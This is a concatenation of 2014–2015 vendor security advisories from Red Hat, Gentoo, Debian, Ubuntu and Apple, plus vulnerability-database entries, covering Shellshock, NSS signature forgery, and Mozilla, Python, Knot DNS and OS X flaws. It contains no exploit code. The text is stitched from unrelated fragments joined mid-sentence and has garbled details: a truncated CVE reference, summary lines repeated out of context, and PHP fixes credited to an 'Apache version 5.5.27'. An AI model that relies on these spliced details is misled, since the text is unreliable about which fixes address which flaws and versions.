bypass environment restrictions to execute shell commands. (CVE-2014-6271)
It was found that the fix for CVE-2014-6271 was incomplete, and Bash still
allowed certain characters to be injected into other environments via
specially crafted environment variables. An attacker could potentially use
this flaw to override or bypass environment restrictions to execute shell
commands. (CVE-2014-7169)
A flaw was found in the way NSS parsed ASN.1 (Abstract Syntax Notation One)
input from certain RSA signatures. (CVE-2014-1568)
It was discovered that the fixed-sized redir_stack could be forced to
overflow in the Bash parser, resulting in memory corruption, and possibly
leading to arbitrary code execution when evaluating untrusted input that
would not otherwise be run as code. (CVE-2014-7186)
An off-by-one error was discovered in the way Bash was handling deeply
nested flow control constructs. Depending on the layout of the .bss
segment, this could allow arbitrary execution of code that would not
otherwise be executed by Bash. (CVE-2014-7187)
Red Hat would like to thank Stephane Chazelas for reporting CVE-2014-6271,
and the Mozilla project for reporting CVE-2014-1568. Upstream acknowledges
Antoine Delignat-Lavaud and Intel Product Security Incident Response Team
as the original reporters of CVE-2014-1568. The CVE-2014-7186 and
CVE-2014-7187 issues were discovered by Florian Weimer of Red Hat Product
Security.
Users of the Red Hat Enterprise Virtualization Hypervisor are advised to
upgrade to this updated package.
4. Solution:
This update is available via the Red Hat Network. Details on how to use the
Red Hat Network to apply this update are available at
https://access.redhat.com/articles/11258
To upgrade Hypervisors in Red Hat Enterprise Virtualization environments
using the disk image provided by this package, refer to:
https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/6/ht
ml/Hypervisor_Deployment_Guide/chap-Deployment_Guide-Upgrading_Red_Hat_Ente
rprise_Virtualization_Hypervisors.html
5. Bugs fixed (https://bugzilla.redhat.com/):
1141597 - CVE-2014-6271 bash: specially-crafted environment variables can be used to inject shell commands
1145429 - CVE-2014-1568 nss: RSA PKCS#1 signature verification forgery flaw (MFSA 2014-73)
1146319 - CVE-2014-7169 bash: code execution via specially-crafted environment (Incomplete fix for CVE-2014-6271)
1146791 - CVE-2014-7186 bash: parser can allow out-of-bounds memory access while handling redir_stack
1146804 - CVE-2014-7187 bash: off-by-one error in deeply nested flow control constructs
6. Package List:
RHEV-M 3.4:
Source:
rhev-hypervisor6-6.5-20140930.1.el6ev.src.rpm
noarch:
rhev-hypervisor6-6.5-20140930.1.el6ev.noarch.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2014-1568.html
https://www.redhat.com/security/data/cve/CVE-2014-6271.html
https://www.redhat.com/security/data/cve/CVE-2014-7169.html
https://www.redhat.com/security/data/cve/CVE-2014-7186.html
https://www.redhat.com/security/data/cve/CVE-2014-7187.html
https://access.redhat.com/security/updates/classification/#critical
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFULad7XlSAg2UNWIIRArccAJ95pkvG2fyfrI6g4Ve/+fAdnbQq2QCffmYR
IH3VLRMcNTi5Gr1GmWlBiFg=
=DD5a
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201504-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Mozilla Products: Multiple vulnerabilities
Date: April 07, 2015
Bugs: #489796, #491234, #493850, #500320, #505072, #509050,
#512896, #517876, #522020, #523652, #525474, #531408,
#536564, #541316, #544056
ID: 201504-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in Mozilla Firefox,
Thunderbird, and SeaMonkey, the worst of which may allow user-assisted
execution of arbitrary code.
Background
==========
Mozilla Firefox is an open-source web browser and Mozilla Thunderbird
an open-source email client, both from the Mozilla Project. The
SeaMonkey project is a community effort to deliver production-quality
releases of code derived from the application formerly known as the
=E2=80=98Mozilla Application Suite=E2=80=99.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 www-client/firefox < 31.5.3 >= 31.5.3
2 www-client/firefox-bin < 31.5.3 >= 31.5.3
3 mail-client/thunderbird < 31.5.0 >= 31.5.0
4 mail-client/thunderbird-bin
< 31.5.0 >= 31.5.0
5 www-client/seamonkey < 2.33.1 >= 2.33.1
6 www-client/seamonkey-bin
< 2.33.1 >= 2.33.1
7 dev-libs/nspr < 4.10.6 >= 4.10.6
-------------------------------------------------------------------
7 affected packages
Description
===========
Multiple vulnerabilities have been discovered in Firefox, Thunderbird,
and SeaMonkey. Please review the CVE identifiers referenced below for
details.
Impact
======
A remote attacker could entice a user to view a specially crafted web
page or email, possibly resulting in execution of arbitrary code or a
Denial of Service condition.
Workaround
==========
There are no known workarounds at this time.
Resolution
==========
All firefox users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=www-client/firefox-31.5.3"
All firefox-bin users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=www-client/firefox-bin-31.5.3"
All thunderbird users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=mail-client/thunderbird-31.5.0"=
All thunderbird-bin users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=mail-client/thunderbird-bin-31.5.0"
All seamonkey users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=www-client/seamonkey-2.33.1"
All seamonkey-bin users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-client/seamonkey-bin-2.33.1"
All nspr users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-libs/nspr-4.10.6"
References
==========
[ 1 ] CVE-2013-1741
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1741
[ 2 ] CVE-2013-2566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2566
[ 3 ] CVE-2013-5590
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5590
[ 4 ] CVE-2013-5591
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5591
[ 5 ] CVE-2013-5592
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5592
[ 6 ] CVE-2013-5593
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5593
[ 7 ] CVE-2013-5595
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5595
[ 8 ] CVE-2013-5596
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5596
[ 9 ] CVE-2013-5597
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5597
[ 10 ] CVE-2013-5598
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5598
[ 11 ] CVE-2013-5599
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5599
[ 12 ] CVE-2013-5600
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5600
[ 13 ] CVE-2013-5601
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5601
[ 14 ] CVE-2013-5602
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5602
[ 15 ] CVE-2013-5603
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5603
[ 16 ] CVE-2013-5604
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5604
[ 17 ] CVE-2013-5605
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5605
[ 18 ] CVE-2013-5606
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5606
[ 19 ] CVE-2013-5607
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5607
[ 20 ] CVE-2013-5609
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5609
[ 21 ] CVE-2013-5610
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5610
[ 22 ] CVE-2013-5612
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5612
[ 23 ] CVE-2013-5613
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5613
[ 24 ] CVE-2013-5614
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5614
[ 25 ] CVE-2013-5615
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5615
[ 26 ] CVE-2013-5616
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5616
[ 27 ] CVE-2013-5618
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5618
[ 28 ] CVE-2013-5619
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5619
[ 29 ] CVE-2013-6671
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6671
[ 30 ] CVE-2013-6672
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6672
[ 31 ] CVE-2013-6673
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6673
[ 32 ] CVE-2014-1477
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1477
[ 33 ] CVE-2014-1478
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1478
[ 34 ] CVE-2014-1479
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1479
[ 35 ] CVE-2014-1480
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1480
[ 36 ] CVE-2014-1481
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1481
[ 37 ] CVE-2014-1482
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1482
[ 38 ] CVE-2014-1483
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1483
[ 39 ] CVE-2014-1485
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1485
[ 40 ] CVE-2014-1486
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1486
[ 41 ] CVE-2014-1487
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1487
[ 42 ] CVE-2014-1488
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1488
[ 43 ] CVE-2014-1489
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1489
[ 44 ] CVE-2014-1490
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1490
[ 45 ] CVE-2014-1491
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1491
[ 46 ] CVE-2014-1492
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1492
[ 47 ] CVE-2014-1493
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1493
[ 48 ] CVE-2014-1494
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1494
[ 49 ] CVE-2014-1496
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1496
[ 50 ] CVE-2014-1497
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1497
[ 51 ] CVE-2014-1498
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1498
[ 52 ] CVE-2014-1499
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1499
[ 53 ] CVE-2014-1500
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1500
[ 54 ] CVE-2014-1502
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1502
[ 55 ] CVE-2014-1505
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1505
[ 56 ] CVE-2014-1508
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1508
[ 57 ] CVE-2014-1509
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1509
[ 58 ] CVE-2014-1510
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1510
[ 59 ] CVE-2014-1511
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1511
[ 60 ] CVE-2014-1512
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1512
[ 61 ] CVE-2014-1513
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1513
[ 62 ] CVE-2014-1514
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1514
[ 63 ] CVE-2014-1518
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1518
[ 64 ] CVE-2014-1519
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1519
[ 65 ] CVE-2014-1520
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1520
[ 66 ] CVE-2014-1522
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1522
[ 67 ] CVE-2014-1523
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1523
[ 68 ] CVE-2014-1524
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1524
[ 69 ] CVE-2014-1525
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1525
[ 70 ] CVE-2014-1526
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1526
[ 71 ] CVE-2014-1529
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1529
[ 72 ] CVE-2014-1530
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1530
[ 73 ] CVE-2014-1531
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1531
[ 74 ] CVE-2014-1532
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1532
[ 75 ] CVE-2014-1533
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1533
[ 76 ] CVE-2014-1534
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1534
[ 77 ] CVE-2014-1536
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1536
[ 78 ] CVE-2014-1537
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1537
[ 79 ] CVE-2014-1538
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1538
[ 80 ] CVE-2014-1539
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1539
[ 81 ] CVE-2014-1540
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1540
[ 82 ] CVE-2014-1541
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1541
[ 83 ] CVE-2014-1542
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1542
[ 84 ] CVE-2014-1543
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1543
[ 85 ] CVE-2014-1544
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1544
[ 86 ] CVE-2014-1545
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1545
[ 87 ] CVE-2014-1547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1547
[ 88 ] CVE-2014-1548
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1548
[ 89 ] CVE-2014-1549
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1549
[ 90 ] CVE-2014-1550
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1550
[ 91 ] CVE-2014-1551
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1551
[ 92 ] CVE-2014-1552
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1552
[ 93 ] CVE-2014-1553
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1553
[ 94 ] CVE-2014-1554
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1554
[ 95 ] CVE-2014-1555
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1555
[ 96 ] CVE-2014-1556
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1556
[ 97 ] CVE-2014-1557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1557
[ 98 ] CVE-2014-1558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1558
[ 99 ] CVE-2014-1559
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1559
[ 100 ] CVE-2014-1560
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1560
[ 101 ] CVE-2014-1561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1561
[ 102 ] CVE-2014-1562
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1562
[ 103 ] CVE-2014-1563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1563
[ 104 ] CVE-2014-1564
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1564
[ 105 ] CVE-2014-1565
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1565
[ 106 ] CVE-2014-1566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1566
[ 107 ] CVE-2014-1567
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1567
[ 108 ] CVE-2014-1568
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1568
[ 109 ] CVE-2014-1574
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1574
[ 110 ] CVE-2014-1575
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1575
[ 111 ] CVE-2014-1576
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1576
[ 112 ] CVE-2014-1577
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1577
[ 113 ] CVE-2014-1578
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1578
[ 114 ] CVE-2014-1580
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1580
[ 115 ] CVE-2014-1581
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1581
[ 116 ] CVE-2014-1582
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1582
[ 117 ] CVE-2014-1583
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1583
[ 118 ] CVE-2014-1584
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1584
[ 119 ] CVE-2014-1585
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1585
[ 120 ] CVE-2014-1586
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1586
[ 121 ] CVE-2014-1587
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1587
[ 122 ] CVE-2014-1588
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1588
[ 123 ] CVE-2014-1589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1589
[ 124 ] CVE-2014-1590
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1590
[ 125 ] CVE-2014-1591
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1591
[ 126 ] CVE-2014-1592
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1592
[ 127 ] CVE-2014-1593
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1593
[ 128 ] CVE-2014-1594
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1594
[ 129 ] CVE-2014-5369
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-5369
[ 130 ] CVE-2014-8631
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8631
[ 131 ] CVE-2014-8632
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8632
[ 132 ] CVE-2014-8634
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8634
[ 133 ] CVE-2014-8635
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8635
[ 134 ] CVE-2014-8636
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8636
[ 135 ] CVE-2014-8637
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8637
[ 136 ] CVE-2014-8638
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8638
[ 137 ] CVE-2014-8639
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8639
[ 138 ] CVE-2014-8640
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8640
[ 139 ] CVE-2014-8641
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8641
[ 140 ] CVE-2014-8642
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8642
[ 141 ] CVE-2015-0817
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0817
[ 142 ] CVE-2015-0818
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0818
[ 143 ] CVE-2015-0819
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0819
[ 144 ] CVE-2015-0820
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0820
[ 145 ] CVE-2015-0821
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0821
[ 146 ] CVE-2015-0822
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0822
[ 147 ] CVE-2015-0823
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0823
[ 148 ] CVE-2015-0824
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0824
[ 149 ] CVE-2015-0825
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0825
[ 150 ] CVE-2015-0826
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0826
[ 151 ] CVE-2015-0827
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0827
[ 152 ] CVE-2015-0828
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0828
[ 153 ] CVE-2015-0829
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0829
[ 154 ] CVE-2015-0830
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0830
[ 155 ] CVE-2015-0831
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0831
[ 156 ] CVE-2015-0832
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0832
[ 157 ] CVE-2015-0833
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0833
[ 158 ] CVE-2015-0834
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0834
[ 159 ] CVE-2015-0835
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0835
[ 160 ] CVE-2015-0836
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0836
[ 161 ] VE-2014-1504
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201504-01
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2015 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
- -------------------------------------------------------------------------
Debian Security Advisory DSA-3034-1 security@debian.org
http://www.debian.org/security/ Yves-Alexis Perez
September 25, 2014 http://www.debian.org/security/faq
- -------------------------------------------------------------------------
Package : iceweasel
CVE ID : CVE-2014-1568
Antoine Delignat-Lavaud from Inria discovered an issue in the way NSS
(the Mozilla Network Security Service library, embedded in Wheezy's
Iceweasel package), was parsing ASN.1 data used in signatures, making it
vulnerable to a signature forgery attack.
For the stable distribution (wheezy), this problem has been fixed in
version 24.8.1esr-1~deb7u1.
For the testing distribution (jessie) and unstable distribution (sid),
Iceweasel uses the system NSS library, handled in DSA 3033-1.
We recommend that you upgrade your iceweasel packages
| VAR-201803-0062 | CVE-2014-0486 | Knot DNS Input validation vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
Knot DNS before 1.5.2 allows remote attackers to cause a denial of service (application crash) via a crafted DNS message. Knot DNS Contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Knot DNS is a DNS server. Knot DNS is prone to an unspecified denial-of-service vulnerability.
Remote attackers can exploit this issue to cause denial-of-service conditions for legitimate users
| VAR-201410-1319 | CVE-2014-7185 | Python ‘ bufferobject.c 'Integer overflow vulnerability |
CVSS V2: 6.4 CVSS V3: - Severity: MEDIUM |
Integer overflow in bufferobject.c in Python before 2.7.8 allows context-dependent attackers to obtain sensitive information from process memory via a large size and offset in a "buffer" function. Python is prone to an integer-overflow vulnerability because it fails to properly bounds check user-supplied input before copying it into an insufficiently sized buffer.
Attackers can exploit this issue to obtain potentially sensitive information or cause a denial-of-service condition.
Versions prior to Python 2.7.8 are vulnerable. The language is scalable, supports modules and packages, and supports multiple platforms. Please review
the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Python 3.3 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/python-3.3.5-r1"
All Python 2.7 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/python-2.7.9-r1"
References
==========
[ 1 ] CVE-2013-1752
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1752
[ 2 ] CVE-2013-7338
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-7338
[ 3 ] CVE-2014-1912
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1912
[ 4 ] CVE-2014-2667
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2667
[ 5 ] CVE-2014-4616
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4616
[ 6 ] CVE-2014-7185
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-7185
[ 7 ] CVE-2014-9365
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9365
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201503-10
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2015 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license. ============================================================================
Ubuntu Security Notice USN-2653-1
June 25, 2015
python2.7, python3.2, python3.4 vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.10
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Several security issues were fixed in Python. A malicious ftp, http,
imap, nntp, pop or smtp server could use this issue to cause a denial of
service. This issue only affected Ubuntu
12.04 LTS and Ubuntu 14.04 LTS. This
issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. This issue only affected
Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-7185)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 14.10:
python2.7 2.7.8-10ubuntu1.1
python2.7-minimal 2.7.8-10ubuntu1.1
python3.4 3.4.2-1ubuntu0.1
python3.4-minimal 3.4.2-1ubuntu0.1
Ubuntu 14.04 LTS:
python2.7 2.7.6-8ubuntu0.2
python2.7-minimal 2.7.6-8ubuntu0.2
python3.4 3.4.0-2ubuntu1.1
python3.4-minimal 3.4.0-2ubuntu1.1
Ubuntu 12.04 LTS:
python2.7 2.7.3-0ubuntu3.8
python2.7-minimal 2.7.3-0ubuntu3.8
python3.2 3.2.3-0ubuntu3.7
python3.2-minimal 3.2.3-0ubuntu3.7
In general, a standard system update will make all the necessary changes. 7) - noarch, x86_64
3. The python27 collection provide a stable release of
Python 2.7 with a number of additional utilities and database connectors
for MySQL and PostgreSQL.
The python27-python packages have been upgraded to upstream version 2.7.8,
which provides numerous bug fixes over the previous version. (BZ#1167912)
The following security issues were fixed in the python27-python component:
It was discovered that the socket.recvfrom_into() function failed to check
the size of the supplied buffer. (CVE-2014-4616)
In addition, this update adds the following enhancement:
* The python27 Software Collection now includes the python-wheel and
python-pip modules. All running python27
instances must be restarted for this update to take effect. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2015-08-13-2 OS X Yosemite v10.10.5 and Security Update
2015-006
OS X Yosemite v10.10.5 and Security Update 2015-006 is now available
and addresses the following:
apache
Available for: OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities existed in Apache 2.4.16, the most
serious of which may allow a remote attacker to cause a denial of
service.
Description: Multiple vulnerabilities existed in Apache versions
prior to 2.4.16. These were addressed by updating Apache to version
2.4.16.
CVE-ID
CVE-2014-3581
CVE-2014-3583
CVE-2014-8109
CVE-2015-0228
CVE-2015-0253
CVE-2015-3183
CVE-2015-3185
apache_mod_php
Available for: OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities existed in PHP 5.5.20, the most
serious of which may lead to arbitrary code execution. These were addressed by updating Apache to version 5.5.27.
CVE-ID
CVE-2015-2783
CVE-2015-2787
CVE-2015-3307
CVE-2015-3329
CVE-2015-3330
CVE-2015-4021
CVE-2015-4022
CVE-2015-4024
CVE-2015-4025
CVE-2015-4026
CVE-2015-4147
CVE-2015-4148
Apple ID OD Plug-in
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able change the password of a
local user
Description: In some circumstances, a state management issue existed
in password authentication. The issue was addressed through improved
state management.
CVE-ID
CVE-2015-3799 : an anonymous researcher working with HP's Zero Day
Initiative
AppleGraphicsControl
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to determine kernel
memory layout
Description: An issue existed in AppleGraphicsControl which could
have led to the disclosure of kernel memory layout. This issue was
addressed through improved bounds checking.
CVE-ID
CVE-2015-5768 : JieTao Yang of KeenTeam
Bluetooth
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue existed in
